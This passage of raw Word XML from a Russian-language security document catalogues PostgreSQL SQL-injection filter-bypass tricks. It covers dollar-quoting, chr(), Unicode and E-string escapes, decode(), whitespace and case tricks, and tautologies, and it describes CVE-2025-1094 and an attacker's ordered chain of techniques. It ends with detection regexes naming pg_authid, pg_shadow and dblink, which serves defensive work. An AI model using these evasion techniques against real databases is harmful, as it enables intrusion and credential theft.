          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для имени функции/каталога в DO-блоке.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3.9.6 Регистр keywords + whitespace tricks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакует разделитель токенов и регистр. Четыре payload-карточки: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whitespace, tab/CR через URL-encode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%09</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%0D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, case-mixing для case-sensitive blacklist, альтернативные тавтологии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR NULL IS NULL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 2&lt;3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Важный анти-паттерн PG: Unicode-whitespace (NBSP, U+2003) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает — PG-лексер ловит только 5 ASCII whitespace-байт.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3.9.7 CVE-2025-1094 (R6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pointer-карточка. Bug в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral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Identifier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String</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StringConn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: невалидный UTF-8 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) проскакивает escape, ломает закрывающую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payload идёт в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исполняет shell. Уязвимы только chain через psql (BeyondTrust PRA/RS, backup-обёртки), не Django/SQLAlchemy/asyncpg. Patch: до 17.3, 16.7, 15.11, 14.16, 13.19 (13 февраля 2025). Полный разбор — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение приёмов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Приём</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 фильтра, который обходит</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Длина запис `'pg_authid'`</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Главное ограничение</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3.9.1 dollar-quote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apostrophe-escape, count-based WAF</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минимум (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$$pg_authid$$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>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 помогает против keyword-blacklist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3.9.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">chr()</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keyword-blacklist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~85 байт</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function call, ловится статистикой `chr(\d+)\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3.9.3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">U&amp;'...'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keyword + function-call sanitizer</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требует </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">standard_conforming_strings=on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (дефолт PG 9.1+)</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3.9.4 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">E'\xNN'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NUL-byte для C-string sanitizer</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E-prefix может быть в blacklist отдельно</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3.9.5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">decode(hex)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длинные строки, без повторных escape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53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длинная hex заметна в логах; для имени — через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EXECUTE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3.9.6 whitespace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WAF </w:t>
            </w:r>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 между keywords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 (не для имён)</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точка инъекции должна быть вне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-литерала</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3.9.7 CVE-2025-1094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сам libpq escape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только chain через psql, не серверный SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбор приёма по контексту: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Фильтр на содержимое литерала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3.9.2 / 3.9.3 / 3.9.4 / 3.9.5.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Фильтр на апостроф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3.9.1.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Фильтр на ключевые слова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 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) → 3.9.6 (whitespace, case, alt-tautology).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Фильтр на функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr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decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) → 3.9.3 (escape-литералы, без function call).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Фильтр на E-prefix → 3.9.3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 или 3.9.5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode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Фильтр на backslash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3.9.3 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UESCAPE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Длинные строки → 3.9.5 (компактнее всех остальных).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Имена функций/таблиц вместо значений → 3.9.2 Payload B / 3.9.5 Payload C (через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 DO) или 3.9.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий после нахождения точки инъекции и распознавания фильтра идёт по такому порядку:</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3.9.6 (whitespace + case)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пробует первым: дешевле всех, не требует function call. Если WAF не нормализует whitespace/case, готово.</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3.9.1 (dollar-quote)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если фильтр на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-кавычки; быстро ломает apostrophe-sanitizer.</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3.9.3 (Unicode-escape) или 3.9.4 (E-strings)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если нужно скрыть содержимое значения (литерал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по выбору — какой синтаксис фильтр пропускает.</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3.9.5 (decode hex/base64)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для длинных строк (≥30 байт) или когда нужна максимально компактная форма; пограничный случай — стек уже комбинирует 3-4 приёма, decode упрощает payload.</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3.9.2 (chr) + DO + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — последний резерв, когда фильтр блокирует и E-prefix, и U&amp;, и decode; chr — единственный приём, который тривиально статистически детектируется, но самый универсальный.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.7 (CVE-2025-1094) не часть этого пайплайна — это отдельный класс эксплуатации против цепочек через psql, не против WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса FILTER_BYPASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный regex по техникам 3.9.1–3.9.6. 3.9.7 не включается: CVE-2025-1094 — баг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">клиентской libpq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не серверного SQL; на стадии, когда payload доходит до judge-а, он уже валиден серверу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Две ветки (high/mid) с разным базовым риском:</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FILTER_BYPASS = "filter_bypass"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VulnerabilityClass.FILTER_BYPASS: 6,</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"filter_bypass_high": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.2 chr-цепочка ≥3 звеньев</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:\bchr\s*\(\s*\d+\s*\)\s*\|\|){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.3 U&amp;'...' или U&amp;"..." с &gt;=2 codepoint-ами подряд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"U&amp;['\"](?:\\[0-9a-fA-F]{4}){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.4 E'\xNN...' или E'\NNN...' с &gt;=2 byte-escape подряд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bE['\"](?:\\(?:x[0-9a-fA-F]{2}|\d{3})){2,}|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.5 decode-hex с длинной hex-строкой</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bdecode\s*\(\s*['\"][0-9a-fA-F]{20,}['\"]\s*,\s*['\"]hex['\"]\s*\)|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.5 decode-base64 с длинной base64-строкой</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bdecode\s*\(\s*['\"][A-Za-z0-9+/]{16,}={0,2}['\"]\s*,\s*['\"]base64['\"]\s*\)",</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"filter_bypass_mid": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.1 dollar-quote с опасным содержимым внутри</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\$[a-zA-Z_][a-zA-Z0-9_]*\$[^$]*?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:dblink|pg_read|pg_authid|pg_shadow|pg_sleep|EXECUTE|COPY)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"[^$]*?\$[a-zA-Z_][a-zA-Z0-9_]*\$|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.9.1 анонимный $$ ... $$ с опасным содержимым</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\$\$[^$]*?(?:dblink|pg_read|pg_authid|pg_shadow|pg_sleep|EXECUTE|COPY)[^$]*?\$\$|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
